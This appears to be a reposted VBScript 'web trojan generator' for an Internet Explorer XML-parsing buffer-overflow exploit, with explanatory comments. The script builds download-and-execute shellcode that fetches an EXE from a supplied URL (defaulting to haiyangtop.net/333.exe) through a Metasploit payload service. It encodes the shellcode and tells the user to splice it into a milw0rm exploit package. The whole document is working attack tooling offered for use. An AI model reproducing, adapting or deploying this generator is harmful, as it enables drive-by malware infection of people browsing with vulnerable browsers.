
网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

程序员文章站 2022-08-27 16:18:21
'code by lcx

' Script entry: asks for an EXE URL, requests a download-and-execute payload
' from the Metasploit web console hard-coded in `url` below, and extracts the
' "$shellcode = ..." text from the HTML it returns.
on error resume next
' From here on every runtime error is suppressed, so a failed HTTP request or
' a regex miss leaves `body` / `code` empty or wrong without any message.
exeurl = inputbox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )
' msfweb payload generator on TCP 55555, module win32_downloadexec; the
' user-supplied exeurl is percent-encoded by urlencoding() defined below.
url="http://www.metasploit.com:55555/payloads?parent=glob%280x25bfa38%29&module=win32_downloadexec&mode=generate&opt_url="&urlencoding(exeurl)&"&maxsize=&badchars=0x00+&encoder=default&action=generate+payload"


' Whole response page, decoded as gb2312 by gethttppage().
body = gethttppage(url)
set re = new regexp
' Keep only the span from "$shellcode =" through the closing "</div></pre>".
re.pattern = "(\$shellcode \=[\s\s]+</div></pre>)"

set matches = re.execute(body)
' On no match, body stays the whole page and the cleanup below runs on it.
if matches.count>0 then body = matches(0).value

' Strip the assignment prefix, double quotes, CR, semicolons, the closing
' tags, LF and dots, leaving a run of \x.. escapes for replaceregex().
code=trim(replace(replace(replace(replace(replace(replace(replace(body,"$shellcode =",""),chr(34),""),chr(13),""),";",""),"</div></pre>",""),chr(10),""),".",""))

function replaceregex(str)
' Rewrites every pair of "\xAA\xBB" escapes in str as one "%uBBAA" escape,
' i.e. two consecutive bytes become a single little-endian 16-bit %u escape.
' Unmatched text is returned unchanged; the match is case-insensitive.
dim rx
set rx = new regexp
with rx
.pattern = "\\x(..)\\x(..)"
.ignorecase = true
.global = true
end with
' Capture 2 (second byte) goes first to produce the little-endian order.
replaceregex = rx.replace(str, "%u$2$1")
end function


function gethttppage(path)
' Downloads path with getbody() and decodes the raw response bytes as gb2312.
gethttppage = bytestobstr(getbody(path), "gb2312")
end function

function getbody(url)
' Synchronous HTTP GET through the Microsoft.XMLHTTP COM object; returns the
' raw response bytes (responsebody). Errors are suppressed, so a failed
' request or unreachable host yields Empty rather than an exception.
on error resume next
dim req
set req = createobject("microsoft.xmlhttp")
req.open "get", url, false, "", ""
req.send
getbody = req.responsebody
set req = nothing
end function

function bytestobstr(body, cset)
' Converts a byte array to a string: writes body into an ADODB.Stream in
' binary mode, rewinds, switches the stream to text mode with charset cset
' and reads the whole content back.
dim strm
set strm = createobject("adodb.stream")
with strm
.type = 1               ' adTypeBinary
.mode = 3               ' adModeReadWrite
.open
.write body
.position = 0           ' rewind before re-reading as text
.type = 2               ' adTypeText
.charset = cset
bytestobstr = .readtext
.close
end with
set strm = nothing
end function

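function urlencoding(vstrin)
' Percent-encodes the characters of vstrin whose code is >= &hff as two
' "%HH" escapes (high byte, low byte); every other character is copied
' through unchanged. Negative asc() values (DBCS characters on an ANSI
' locale) are first folded into the 0..&hffff range.
' Returns the encoded string; "" for an empty input.
' Fixes vs. the original: the high byte is obtained with \ &h100 (not \ &hff,
' which mis-encodes a high byte of &hff as "100"), and both hex digits are
' zero-padded so a byte below &h10 no longer yields a one-digit escape.
dim strreturn, aaaa, thischr, innercode, hight8, low8
strreturn = ""
for aaaa = 1 to len(vstrin)
thischr = mid(vstrin,aaaa,1)
if abs(asc(thischr)) < &hff then
strreturn = strreturn & thischr
else
innercode = asc(thischr)
if innercode < 0 then
innercode = innercode + &h10000
end if
' Integer division by &h100 isolates the high byte exactly.
hight8 = (innercode and &hff00) \ &h100
low8 = innercode and &hff
strreturn = strreturn & "%" & right("0" & hex(hight8), 2) & "%" & right("0" & hex(low8), 2)
end if
next
urlencoding = strreturn
end function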

' Output stage: writes the %u-encoded result to a.txt in the current working
' directory (opentextfile mode 2 = ForWriting, create = true, so an existing
' file is overwritten) and echoes the same text to the console. Both the
' FileSystemObject and the earlier XMLHTTP/ADODB.Stream COM objects are
' observable host artifacts of this script running under wscript/cscript.
set fso=createobject("scripting.filesystemobject")
set files=fso.opentextfile("a.txt",2,true)
files.writeline replaceregex(code)
'files.writeline body
wscript.echo replaceregex(code)
files.close
set fso=nothing

' Completion message naming the generated file a.txt.
wscript.echo chr(13)&"ok,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"